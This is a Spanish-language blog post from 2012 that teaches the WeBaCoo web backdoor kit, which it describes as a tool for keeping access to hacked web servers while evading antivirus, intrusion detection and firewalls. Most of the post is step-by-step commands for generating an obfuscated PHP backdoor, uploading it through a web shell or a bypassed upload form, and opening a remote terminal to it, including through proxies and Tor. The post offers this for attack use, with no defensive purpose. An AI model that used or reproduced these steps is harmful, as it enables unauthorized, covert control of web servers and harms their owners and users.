domingo, 7 de octubre de 2012

Establecer Terminal con un Sitio Web Con Webacoo -Backdoor

WeBaCoo (Web Backdoor Cookie)  es un backdoor web script-kit que proporciona una terminal de  conexión a través de HTTP entre el cliente y el servidor web. Se trata de una herramienta de explotación para mantener el acceso a un servidor web (hacked). WeBaCoo fue diseñado para operar bajo el radar de la moderna puesta al anticuado AV, NIDS, IPS, Network Firewalls y Application Firewalls

WeBaCoo ofrece un modo de generar el código para crear el PHP backdoor, usando payloads predefinidos. También ofrece la "terminal" el modo en que el usuario puede establecer una remota  conexión con el servidor y ejecutar comandos con privilegios deseados del servicio web.


COMANDOS:
1) Crear backdoor ofuscado 'backdoor.php' con la configuración predeterminada:
  • ./webacoo.pl -g -o backdoor.php
2) Crear 'raw-backdoor.php' backdoor des-ofuscado usando la funciona "transito":
  • ./webacoo.pl -g -o raw-backdoor.php -f 4 -r
3) Establecer "terminal" conexión con el host remoto usando la configuración por defecto:
  • ./webacoo.pl -t -u http://127.0.0.1/backdoor.php
4) Establecer "terminal" conexión con el host remoto al configurar algunos argumentos:
  • ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TtT"
5) Establecer "terminal" conexión con el host remoto a través de proxy HTTP:
  • ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080
6) Establecer "terminal" conexión con el host remoto a través de HTTP proxy con autenticación básica:
  • ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128
7) Establecer "terminal" conexión con el host remoto a través de Tor y registrar la actividad:
  • ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt

Ejemplo:

          [+] [+] BACKDORIZANDO SITIO CONEXION RAPIDA [+] [+]

Webacoo.pl -h   





2.-  CREANDO EL BACKDOOR


        [+] C:\carpeta\webacoo.pl -g -o "nombre,php" 

 Sin Comillas :3





[+]Backdoor File Backoor.php Created

                               //Se ha creado el backdoor listo para subir al servidor


3.-  Subir mediante una shell el Backdoor o un upload bypaseado

 Shell Decodev2.php



4.- Establecer Terminal en el backdoor  

[+]   C:\carpeta\webacoo.pl  -t -u "URL del backdoor"




ESTABLECIMOS UNA TERMINAL ENTRE UN SITIO WEB & TU PC 
  ESTO SE UTILZA EN OCACIONES EN EL LOS BACKDOOR NO CONECTAN EN LA PC CON UN SIMPLE NETCAT  

[+]ESTA APLICACION FACILITA LA CONEXION REMOTA SI NECESIDAD DE ESCUCHAR PUERTOS MANUALMENTE


No hay comentarios:

Publicar un comentario